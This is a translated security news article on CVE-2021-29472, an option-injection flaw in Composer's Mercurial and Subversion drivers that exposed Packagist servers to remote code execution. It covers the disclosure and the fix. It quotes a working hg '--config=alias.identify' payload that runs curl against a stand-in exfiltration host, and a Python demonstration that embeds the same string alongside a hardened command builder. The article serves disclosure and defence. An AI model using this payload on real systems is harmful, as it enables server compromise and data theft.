Vulnerability in the Composer package manager that allowed the Packagist PHP package repository to be compromised

A critical vulnerability (CVE-2021-29472) has been identified in the Composer dependency manager that allows arbitrary commands to be executed on the system while processing a package whose metadata contains a specially crafted URL pointing at the location from which the code is to be downloaded. The problem lies in the GitDriver, SvnDriver and HgDriver components used to work with the Git, Subversion and Mercurial source control systems. The vulnerability was fixed in Composer releases 1.10.22 and 2.0.13.

Notably, the issue mainly affected the main Composer package repository, Packagist, which hosts about 306,000 packages from PHP developers and serves more than 1.4 billion downloads per month. The experiment showed that, had the problem been known to attackers, they could have taken control of Packagist's infrastructure and intercepted maintainer credentials or redirected package downloads to a third-party server, arranging for modified package versions with malicious changes to be delivered in order to plant a backdoor during dependency installation.

The danger to end users is limited by the fact that the contents of composer.json are usually defined by the user themselves, and source URLs are only passed when accessing third-party repositories, which are generally trusted. The main impact fell on the Packagist.org repository and the Private Packagist service, which invoke Composer and pass it data received from users. Attackers could execute their own code on the Packagist servers by submitting a specially crafted package.

The Packagist team fixed the vulnerability less than 12 hours after it was reported. The researchers privately notified the Packagist developers on April 22, and the problem was fixed the same day. The public Composer update closing the vulnerability was published on April 27, and the details were disclosed on April 28. A review of the logs on the Packagist servers revealed no suspicious activity related to the vulnerability.

The problem stems from an error in the code that validates URLs in the composer.json file and source download links. The bug had been present in the code since November 2011. To fetch code without being tied to a particular source control system, Packagist relies on Composer's driver layer, which runs commands by calling "fromShellCommandline" and passing it command-line arguments. For example, for git the command "git ls-remote --heads $URL" is invoked, where the URL is first processed by the "ProcessExecutor::escape($url)" method, which escapes potentially dangerous constructs such as "$(...)" or "`...`".

The root of the problem is that the ProcessExecutor::escape method did not neutralise the "--" sequence, so any additional parameter of the invoked command could be supplied through the URL. Such handling was missing in the GitDriver.php, SvnDriver.php and HgDriver.php drivers. An attack on GitDriver.php was blocked by the fact that the "git ls-remote" command did not accept additional options after the path. An attack through HgDriver.php became possible by passing the "--config" parameter to the "hg" command, which allows arbitrary command execution to be arranged via "alias.identify". For example, to run curl on the host and post the output of "ls -alh" to an external server, one could specify: --config=alias.identify=!curl http://exfiltration-host.tld --data "$(ls -alh)"
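To make the mechanism concrete, here is an added Python example (it is not Composer's code, which is PHP): shlex.quote stands in for ProcessExecutor::escape, shlex.split stands in for the shell that Process::fromShellCommandline hands the line to, and a small argparse parser stands in for hg's option parsing. The repository URL, the host name in the payload, and the assumption that hg honours the POSIX "--" end-of-options marker are illustrative assumptions, not facts taken from the page.

```python
import argparse
import shlex

# Constructed sample inputs (not from the original article's code): the hg option
# string quoted in the write-up above, and a hypothetical benign repository URL.
MALICIOUS_URL = '--config=alias.identify=!curl http://exfiltration-host.tld --data "$(ls -alh)"'
BENIGN_URL = "https://hg.example.org/project"


def build_hg_identify_vulnerable(url: str) -> str:
    """Pre-fix pattern: shell-escape the URL and splice it into the command line.
    shlex.quote plays the role of ProcessExecutor::escape: both neutralise $(...)
    and backticks, but neither changes a value that merely starts with '--'."""
    return f"hg identify {shlex.quote(url)}"


def argv_after_shell(command_line: str) -> list:
    """The argv the program receives once /bin/sh has parsed the command line."""
    return shlex.split(command_line)


def injected_options(url: str) -> list:
    """Arguments after 'hg identify' that a getopt-style parser would treat as
    options rather than as the repository path. Anything here is option injection."""
    argv = argv_after_shell(build_hg_identify_vulnerable(url))
    return [arg for arg in argv[2:] if arg.startswith("-")]


def hg_stand_in_parse(argv: list) -> tuple:
    """Minimal stand-in for hg's option parsing: a repeatable global --config
    option and an optional SOURCE positional. Returns (config values, source)."""
    parser = argparse.ArgumentParser(prog="hg identify", add_help=False)
    parser.add_argument("--config", action="append", default=[])
    parser.add_argument("source", nargs="?")
    ns = parser.parse_args(argv)
    return ns.config, ns.source


def is_safe_vcs_url(url: str) -> bool:
    """Reject values the invoked command would read as an option instead of a URL.
    Leading whitespace is stripped first, conservatively, in case a later layer
    trims the value before it reaches the command."""
    return not url.lstrip().startswith("-")


def build_hg_identify_hardened(url: str) -> str:
    """Validate first, then terminate option parsing with '--' (assumed here to be
    honoured by hg, as by git and svn) so that even a value which slipped past
    validation is taken as a positional argument, never as an option."""
    if not is_safe_vcs_url(url):
        raise ValueError(f"refusing VCS URL that looks like a command option: {url!r}")
    return f"hg identify -- {shlex.quote(url)}"


if __name__ == "__main__":
    line = build_hg_identify_vulnerable(MALICIOUS_URL)
    print("quoted command line:", line)
    print("options reaching hg:", injected_options(MALICIOUS_URL))
    print("hg would see --config =", hg_stand_in_parse(argv_after_shell(line)[2:])[0])
    print("hardened, benign URL:", build_hg_identify_hardened(BENIGN_URL))
    try:
        build_hg_identify_hardened(MALICIOUS_URL)
    except ValueError as exc:
        print("hardened, malicious URL:", exc)
```

The quoted payload survives the shell as a single argv element, so hg parses it as one --config option whose value is "alias.identify=!curl ...": quoting against $(...) and backticks is simply the wrong defence for option injection. The hardened builder layers two independent checks, a leading-dash rejection and the "--" separator, so the command line stays safe even if one of them is later bypassed.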

By submitting a test package with such a URL to Packagist, the researchers confirmed that, after submission, their server received an HTTP request from one of Packagist's servers in AWS containing a listing of the files in the current directory.

Source: opennet.ru
